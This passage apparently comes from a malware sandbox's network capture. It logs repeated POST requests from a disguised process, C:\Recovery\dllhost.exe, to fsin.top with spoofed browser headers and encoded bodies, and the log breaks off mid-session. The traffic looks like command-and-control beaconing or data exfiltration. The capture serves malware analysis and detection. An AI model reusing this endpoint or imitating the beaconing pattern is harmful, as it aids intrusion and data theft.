                                                  Aug 1, 2024 07:38:12.883086920 CEST | 737 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FDhh1dvn7s01HSHvkU0rNgWEvLZRs5vzDPqksj6qxM%2BDM%2BixwDug7usMZQNzPmuFHBxybDo%2BTxayv908WhCPYJClFkxOASUmJmNXV%2BnDuTbYgGG4G2YKWdMBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b0cce7543c7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 54 24 5e 22 1d 22 5c 3b 09 2a 32 22 0e 29 33 28 5b 28 17 30 01 27 3f 2a 03 26 06 05 0f 36 3c 31 58 27 11 2d 0d 26 22 22 58 3e 1d 21 51 04 11 25 05 21 20 32 5c 3e 29 3b 5c 33 06 27 13 20 08 2b 01 26 23 0f 13 35 39 28 15 29 32 3d 11 28 0b 33 57 2e 3b 34 06 2a 23 3c 5d 26 26 2a 56 0d 17 22 50 2e 3b 3f 0f 33 22 38 55 23 3c 2b 54 34 05 2e 02 2a 3c 2a 59 3e 1a 32 10 2c 23 27 11 3d 0d 0c 1b 2b 03 22 07 2b 2a 25 53 30 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"T$^""\;*2")3([(0'?*&6<1X'-&""X>!Q%! 2\>);\3' +&#59()2=(3W.;4*#<]&&*V"P.;?3"8U#<+T4.*<*Y>2,#'=+"+*%S09"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  64 | 192.168.2.4 | 49801 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:12.320421934 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:12.677862883 CEST | 1012 | OUT | Data Raw: 54 55 5d 50 5a 5d 5d 57 5c 5e 5a 51 54 51 57 51 57 56 5e 5f 56 5d 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TU]PZ]]W\^ZQTQWQWV^_V]QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[3T"#><X05 (!>%5&^;W1&1<T/.!?&&G#.X!
                                                  Aug 1, 2024 07:38:12.773411036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:13.037020922 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQR6%2BP4W4rFZqrpCgKFxeVWlhk7K0FceTRAE37jwBVTZW%2BzX3em%2BxIxzLmjvTzL%2But42Ay4QDENHUMtZ6CS27iPA6Pivxpn0b4FWpucAc0lee%2BknwyZSByX3Sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b0d8d0f0c74-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  65 | 192.168.2.4 | 49802 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:13.166460037 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:13.521601915 CEST | 1012 | OUT | Data Raw: 51 50 58 5c 5a 54 58 52 5c 5e 5a 51 54 55 57 50 57 57 5e 5a 56 5d 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPX\ZTXR\^ZQTUWPWW^ZV]QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'2\"=3+"*5"Y2+S1200S,>#_#8#2&G#.X!(
                                                  Aug 1, 2024 07:38:13.619153023 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:13.912322998 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFexupr3CaXmFCf01lsQnnPoQMoC%2B3KSlUfZkoAbOz%2BCBfKG7E7Mousaw7pYbj2E0OaCT691%2Fdbkd7vgQxuKVsc0EWEYSw0dSObi2gWmfOPYmXD2kl5LBQ6JLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b12de9b41ad-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  66 | 192.168.2.4 | 49803 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:14.043605089 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:14.396508932 CEST | 1012 | OUT | Data Raw: 54 5e 5d 57 5a 5b 58 52 5c 5e 5a 51 54 55 57 56 57 5e 5e 5b 56 5b 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^]WZ[XR\^ZQTUWVW^^[V[QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'"-^673%;]<+5=66&825&U7,X3X5_'5&G#.X!(
                                                  Aug 1, 2024 07:38:14.492444038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:14.736319065 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:14 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=294PS8mbD%2FOzQGg4n%2BXgDcZAI%2BUB805QiBq%2Bni9xD4QKRRpm4DNmWwR2Yfmax3WHPQ73ybb0Ugvm%2FzzFaqQ9NVIslCRhjpHE1uuKlSZ1cncFi5nq7Apw6QMDGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b1849ff8c8d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  67 | 192.168.2.4 | 49804 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:14.868654966 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:15.224642038 CEST | 1012 | OUT | Data Raw: 51 50 58 53 5f 59 58 56 5c 5e 5a 51 54 50 57 5a 57 5e 5e 5f 56 5d 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXS_YXV\^ZQTPWZW^^_V]Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X36 &&'<8=>6"%8?S2?&13$,!( 2%&G#.X!<
                                                  Aug 1, 2024 07:38:15.384660959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:15.616525888 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sf7Ga2P4to1tzW0I9rXRGjYtupEeivgfxn7XUDz8jBe7yF%2BxEdbb%2Fwfxr7Ce5vgNqTFBVqi%2Fny1AgWOrv3g%2FypowfG6nXi9iw7%2BwwWVsHolQoO0rhhBvOpsd%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b1dba310f9f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  68 | 192.168.2.4 | 49805 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:15.761842966 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:16.115396023 CEST | 1012 | OUT | Data Raw: 51 54 58 54 5a 54 5d 56 5c 5e 5a 51 54 51 57 52 57 5f 5e 59 56 5a 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXTZT]V\^ZQTQWRW_^YVZQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z0"".8Y&%,)+&>69'88%/&Y% (S8.,#+']25&G#.X!
                                                  Aug 1, 2024 07:38:16.233439922 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:16.471631050 CEST | 590 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:16 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6goADs9ziJLNzHtyg1hY11Zf%2Fq9aPXvHUVVPRnA0lhbJkP%2FDF7YVAX1MOkRASKR55tmmib8frXKDV%2F4mnEeRNVXgH6x9ipxklPt7HJeTEVd6CKC%2BFBWNDJ%2B6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b2328553338-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  69 | 192.168.2.4 | 49806 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:16.604471922 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:16.959007978 CEST | 1012 | OUT | Data Raw: 54 50 5d 52 5a 5b 58 54 5c 5e 5a 51 54 53 57 57 57 55 5e 58 56 55 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TP]RZ[XT\^ZQTSWWWU^XVUQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$!\58]3%(+T**^'(+&,!$3,V8-8!; %5&G#.X!0
                                                  Aug 1, 2024 07:38:17.102906942 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:17.360004902 CEST | 582 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:17 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYBsAflUaaK0pcZZ3p84aPGf74vCDPRZvJv0BvnnUTJE62rJjZBzEQibToivHQuxzVxAK9ywduAWi%2FfWSt%2FiEw9nuNQqPR8GnBWchru3u9Um0vv30ihpmmDJsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b289ecd8c09-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  70 | 192.168.2.4 | 49807 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:17.518357038 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:17.865236998 CEST | 1012 | OUT | Data Raw: 51 55 5d 56 5a 5f 58 53 5c 5e 5a 51 54 5f 57 55 57 5e 5e 5b 56 58 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QU]VZ_XS\^ZQT_WUW^^[VXQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!3Z![$$6#_<(!=%&2#R11%#,/=85;;\1&G#.X!


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  71 | 192.168.2.4 | 49808 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:17.903141022 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:18.256093025 CEST | 1284 | OUT | Data Raw: 54 53 5d 50 5a 58 58 54 5c 5e 5a 51 54 5f 57 53 57 52 5e 5b 56 54 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TS]PZXXT\^ZQT_WSWR^[VTQU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0")6 ]0^(;.V*5"Y'8%?"2U#/X8"8+X'5&G#.X!
                                                  Aug 1, 2024 07:38:18.354029894 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:18.532893896 CEST | 732 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wsbacJ5t3AoRyNgkk1vidZiJ3AMlNNMaCNpYNyvkKd%2F%2Ft5C125hWyoW69EBRQsCk19rzHV9wCNK6egaGIqkVztoOSaoRl%2FhyH2yZYoH%2BRwApE8OB2O6yX%2Fv7mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b306fed42de-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 1c 30 5e 21 09 22 2a 30 53 3e 31 21 52 29 23 09 04 3c 5f 24 04 26 12 3a 06 26 5e 24 55 36 05 39 13 24 06 32 50 32 22 00 1d 29 0d 21 51 04 11 26 5e 34 23 26 5f 3d 07 27 1f 30 01 33 5b 22 25 3f 05 26 33 3e 0e 35 3a 20 5c 29 32 1b 5c 3c 22 0e 0a 3a 28 2b 5c 3f 30 3b 02 25 36 2a 56 0d 17 22 54 39 38 16 1e 27 1c 0d 0c 34 02 2f 56 37 15 2d 5a 3d 2c 31 04 2a 34 31 07 2e 1d 2f 5f 29 1d 00 51 3c 03 0f 1d 3f 04 3d 52 33 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a
                                                  Data Ascii: 98"0^!"*0S>1!R)#<_$&:&^$U69$2P2")!Q&^4#&_='03["%?&3>5: \)2\<":(+\?0;%6*V"T98'4/V7-Z=,1*41./_)Q<?=R39"],-H=YM
                                                  Aug 1, 2024 07:38:18.635634899 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  72 | 192.168.2.4 | 49809 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:18.025384903 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:18.380831957 CEST | 1012 | OUT | Data Raw: 51 55 58 54 5f 5e 5d 56 5c 5e 5a 51 54 57 57 55 57 50 5e 56 56 5f 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUXT_^]V\^ZQTWWUWP^VV_Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!326=?0')(5*&=%;2*%# ,X$!'5&G#.X!
                                                  Aug 1, 2024 07:38:18.541606903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:18.680062056 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hd5JYDiDFoeYwQQCaInujZvh6a9uhMWr6eo810cONunAJtXQCaqJwUSeMnIu%2Fvs3695KcIv3tCh%2Fm8YbcPbDOvTf9iQQmMadKaKSyE1cpenq13%2B5M6ak5t8NzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b3178a842f5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  73 | 192.168.2.4 | 49810 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:18.831387997 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:19.178953886 CEST | 1012 | OUT | Data Raw: 54 55 58 54 5a 5a 58 52 5c 5e 5a 51 54 51 57 54 57 5e 5e 59 56 5a 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXTZZXR\^ZQTQWTW^^YVZQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%2_!=,]'5#)+>=18%,.X1 4S8'!8%%&G#.X!
                                                  Aug 1, 2024 07:38:19.273462057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:19.511104107 CEST | 594 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:19 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7p2z5Xhb%2FpB6k4JZmn%2BgmgXQew4LIDLM7GbghYj%2BQ%2BGToENUQRJEJLjB6%2BL1Anz4UEVWs6c2vTJWMKHcmUAbdveTsltwZ%2BxhOui2iAc2yZ%2BnXsja%2BGHpbfuBYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b362b2172a4-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  74 | 192.168.2.4 | 49811 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:19.634608984 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
